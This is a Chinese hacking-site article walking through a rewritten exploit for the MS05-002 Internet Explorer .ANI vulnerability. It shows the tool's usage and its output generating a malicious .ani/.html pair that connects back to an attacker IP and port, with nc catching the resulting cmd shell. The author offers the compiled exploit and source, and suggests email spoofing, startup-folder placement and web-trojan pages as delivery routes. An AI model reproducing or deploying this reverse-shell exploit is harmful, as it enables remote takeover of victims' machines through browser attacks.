主页 PC知识 网管技术 黑客帝国 安全技术 开放系统 程序设计 搜索 技术论坛

 

相关联接
 
RHU本级分类

新手入门
入侵实例
工具使用
安全防范
黑客人物
软件破解
漏洞研究
 
RHU阅读排行
·Kaspersky杀毒软件klif.sys权限提升漏洞
·OBLOG函数adodb_loadfile()暴库分析[终结]
·SERV-U 6.4提权方法,通杀SERV-U版本
·暴风影音3.7.11.13 爆远程拒绝服务漏洞
·亲身实践 不用密码进入XP系统的方法
·MS06070漏洞攻击代码
·如何利用终端服务入侵远程计算机
·博客入侵太简单 四大漏洞入侵博客
·IIS常见漏洞攻防实战
·DriverStudio Remote Control远程调用认证绕过漏洞及其利用研究

 
 
RHU最新文章
·IE7 0DAY漏洞所用shellcode的分析
·微软发出蠕虫警告 本年度最大漏洞已经出现威胁
·利用XSSDetect自动检测跨站脚本漏洞
·Discuz! 6.x/7.x SODB-2008-13 Exp
·有保险箱的情况下杀掉360安全卫士的BAT脚本代码
·微软Windows WINS服务本地权限提升漏洞
·Coppermine Photo Gallery任意命令执行漏洞
·详解WINRAR的自解压跨站攻击漏洞
·[Advisory]迅雷ActiveX控件远程代码执行漏洞
·首页巡警v1.1/1.0 内核驱动 拒绝服务 及 本地提权漏洞

 
 
RHU相关搜索









 
 
RHU广而告之

 
 
>您的位置:首页 -> 黑客帝国-> 漏洞研究
ms05002漏洞利用程序及其测试结果

作者:RHU-TAC编辑员 来自:RHU网络编辑 时间:2005-3-2 双击滚屏 收藏本页 字体:

点击 查看RHU2004全年文章


作者:无敌最寂寞[E.S.T]
来源:邪恶八进制 中国

漏洞详细资料可以去下面的这个地址下载:
_blank>http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx

拿到代码后,仔细阅读了一下代码.原代码是采用了本地邦定的shellcode.实战性太差,又由于本漏洞和以前的那个IEFRAME TAG溢出漏洞有一些相似点.比如由于溢出后产生的shell继承了IE的权限,而此权限取决于运行IE的用户,因此利用此漏洞提升权限的可能性就很小了.不过,也不是不可能,比如邮件欺骗,或者放到管理员账户自启动的文件夹里等等.因此我修改了部分源代码,去掉了本定邦定的shellcode,换上了反向链接的shellcode.

程序运行界面如下:

_code cellSpacing=1 cellPadding=0 width="90%" border=0>
H:\temp\c\lcc>ms05002

(MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit

Copyright (c) 2004-2005 .: houseofdabus :.


rewritten by 无敌最寂寞@EST


Tested on all affected systems:
[+] Windows Server 2003
[+] Windows XP SP1, SP0
[+] Windows 2000 All SP

This is provided as proof-of-concept code only for educational purposes and test
ing by authorized individuals with permission to do so.

Usage:
ms05002 <file> <connect back ip> <connect back port>


很简单的利用方法.首先我们先用这个程序来生成溢出文件:
_code cellSpacing=1 cellPadding=0 width="90%" border=0>
H:\temp\c\lcc>ms05002 test 10.0.0.138 1314

(MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit

Copyright (c) 2004-2005 .: houseofdabus :.


rewritten by 无敌最寂寞@EST


Tested on all affected systems:
[+] Windows Server 2003
[+] Windows XP SP1, SP0
[+] Windows 2000 All SP

This is provided as proof-of-concept code only for educational purposes and test
ing by authorized individuals with permission to do so.


Creating test.ani file ... Ok

Creating test.html file ... Ok


生成后,用nc监听本定端口1314,然后用IE打开溢出文件test.html(打开方法有多钟,实战中看个人发挥,我这里为了直观,是先打开IE然后从菜单中打开test.html的,打开后IE僵死,弹出一新的cmd窗口,接着nc得到一个cmd shell,测试图如下:
_blank>Click to Open in New Window
到此此漏洞测试完毕.我附上修改后以编译好的文件和源代码.谢谢大家的支持!

补充一点的是,这个跟以前的那个IEFRAME TAG溢出漏洞利用上的很大的不同之处就是,IEFRAME tag 采用的触发方法是暴力扩大内存的方法,因此会造成内存的非常大的消耗...很容易造成机器假死或者当机.但是此漏洞不同,他只是会造成IE的死掉,但并不会占用大量内存 .所以巧妙的运用到网页木马上有的时候也会有奇效!


OVER
[1] 页 RedHyphone.Union 投稿邮箱
[特别声明]:
本站文章大多搜索转载自网络中,如果侵犯了您的权利,请告之我们。本站将立即删除。
本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有。
查看评论】【向上滚屏】【关闭窗口】【 打印
-相关文章
  • openSUSE 11.1 Final - 正式发布
  • [视频]Opera Mini 4.2 正式版发布
  • dll注入系统进程(开源代码)
  • 认知盲区 解惑双网卡双线路DNS解析
  • FlashFXP 简体中文版 3.7.5 Build 1303 Beta[烈火]
    		•
    -文章评论 (关闭)
    ·还没有相关的评论!

    网上大名:
    红旋风网络技术联盟 RHUTech.Union
     
    Copyright © 2000-2007 RedHyphone.Union All Rights Reserved. 红旋风联盟版权所有.皖ICP备05011033号
    中国红旋风网络技术联盟 | www.RedHyphone.net
    Mailto:Redhyphone@gamil.com